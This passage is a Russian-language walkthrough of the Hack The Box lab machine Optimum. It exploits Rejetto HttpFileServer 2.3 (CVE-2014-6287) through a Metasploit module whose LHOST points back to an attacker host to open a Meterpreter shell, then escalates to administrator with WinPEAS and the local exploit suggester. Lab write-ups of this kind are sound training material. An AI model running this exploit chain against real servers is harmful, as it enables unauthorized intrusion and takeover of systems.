
Разбор машины Optimum с Hack The Box. Это прохождение охватывает эксплуатацию Rejetto HttpFileServer 2.3 (CVE-2014-6287) для получения начального доступа, с последующим повышением привилегий на хосте Windows с использованием методов перечисления и инструментов пост-эксплуатации.
В этой машине цель состоит в получении первоначального доступа к хосту Windows путем эксплуатации уязвимого веб-сервиса, а затем повышении привилегий для получения флага администратора.
Путь атаки включал:
Начинаем с полного TCP-сканирования портов для выявления открытых сервисов.
nmap -Pn -n -p- --min-rate 5000 -T4 <TARGET_IP>
Сканирование показывает открытый порт 80.
Далее выполняем сканирование сервиса и версии.
nmap -p80 -sSCV --min-rate 5000 -T4 <TARGET_IP>
Результат определяет следующий сервис:
HttpFileServer 2.3
Этот сервис соответствует Rejetto HTTP File Server, легковесному файловому веб-серверу.
После исследования обнаруженной версии находим известную уязвимость:
CVE-2014-6287
Эта уязвимость позволяет удаленное выполнение кода из-за неправильной санитизации входных данных.
Для эксплуатации уязвимости используем Metasploit.
Запускаем Metasploit:
msfconsole -q
Ищем подходящий модуль:
search rejetto
Загружаем модуль эксплуатации:
use exploit/windows/http/rejetto_hfs_exec
Настраиваем необходимые параметры:
set RHOSTS <TARGET_IP>
set RPORT <TARGET_PORT>
set LHOST <ATTACKER_IP>
set LPORT <ATTACKER_PORT>
run
После выполнения эксплойт открывает сессию Meterpreter на целевой машине.
В полученной сессии Meterpreter перемещаемся по файловой системе, чтобы получить флаг пользователя.
cd
cat user.txt
whoami
Вывод команды показывает, что мы вошли как:
kostas
Поскольку этот пользователь не имеет административных привилегий, приступаем к повышению привилегий.
Для выявления потенциальных векторов повышения привилегий загружаем WinPEAS, известный инструмент для перебора привилегий в Windows.
upload /usr/share/peass/winpeas/winPEAS.exe C:\Users\kostas\Desktop\wp.exe
Затем выполняем его:
shell
.\wp.exe
Вывод раскрывает полезную информацию, включая учётные данные, связанные с пользователем kostas.
После анализа возможных векторов повышения привилегий используем модуль Metasploit:
local_exploit_suggester
Загружаем модуль:
use post/multi/recon/local_exploit_suggester
Настраиваем сессию:
set SESSION <SESSION_NUMBER>
run
Этот модуль предлагает возможные локальные эксплойты для повышения привилегий.
После успешного повышения привилегий получаем оболочку с правами администратора.
Проверка:
shell
whoami
Получив административные привилегии, переходим в каталог администратора для получения флага root.
cd \Users\Administrator
dir
cd Desktop
dir
type root.txt
Эта машина демонстрирует несколько важных концепций пентестинга: